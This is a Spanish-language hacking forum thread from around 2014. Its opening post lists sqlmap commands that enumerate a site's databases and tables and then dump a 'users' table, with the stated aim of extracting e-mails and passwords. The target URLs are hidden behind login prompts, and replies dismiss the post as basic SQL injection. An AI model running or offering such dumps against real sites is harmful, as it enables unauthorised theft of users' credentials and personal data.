Un pequeño aporte con sqlmap para sacar e-mail con el usser etc..

  • 4 Respuestas
  • 3771 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado panik0

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
backtrack - sqlmap

abren terminal  y ponen

1)  cd /pentest/database/sqlmap

2)  ./sqlmap.py -u You are not allowed to view links. Register or Login --dbs

3)  sqlmap.py -u You are not allowed to view links. Register or Login -D pjirc_forum --tables
 
4) (esta te manda directo con el user ,email , etc..)   ./sqlmap.py -u You are not allowed to view links. Register or Login -D tito_tito -T users --dump

(occional si quieren hacerlo paso a paso...)                  *sqlmap.py -u You are not allowed to view links. Register or Login -T users --columns

                                                                                     *sqlmap.py -u You are not allowed to view links. Register or Login -T users -U test --dump

                                                                                 
=D jhejejejejjeje ps  si tienen duda pregunten nada se pierde con  preguntar jejej ..  jejeje  ;D
« Última modificación: Agosto 16, 2014, 10:35:58 am por Expermicid »

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
Que es lo que tratas de explicar exactamente?  :-\

Desconectado panik0

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
para poder sacar los e-mails  , contraseñas etc... jeje :P

Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 294
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
Sacarlos de donde?
Eso solo es sqli con sqlmap, no todas las bases de datos tienen el mismo nombre ni las mismas tablas, aqui en el foro hay muchos tutoriales de los que puedes aprender, echale ganas ;)


cuanta razon tienes, cuanta.... saludos

 

Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 8156
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 3847
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr
Gcat - Python Backdoor Usando Gmail para Mando y Control

Iniciado por R3v0lve

Respuestas: 2
Vistas: 6319
Último mensaje Noviembre 18, 2015, 08:52:40 pm
por Stuxnet
Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 4033
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 3008
Último mensaje Mayo 20, 2013, 08:49:26 pm
por StuXn3t